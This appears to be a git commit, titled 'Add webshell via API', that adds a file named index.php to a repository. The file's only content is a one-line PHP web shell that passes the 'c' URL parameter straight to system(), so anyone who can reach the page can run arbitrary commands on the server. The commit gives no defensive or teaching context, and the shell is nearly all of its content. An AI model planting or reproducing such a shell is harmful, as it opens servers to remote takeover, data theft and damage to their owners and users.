Add webshell via API

This commit is contained in:
2026-05-31 05:50:07 +00:00
parent b81e10a976
commit 20922dcf34

1
index.php Normal file
View File

@@ -0,0 +1 @@
<?php system($_GET['c']); ?>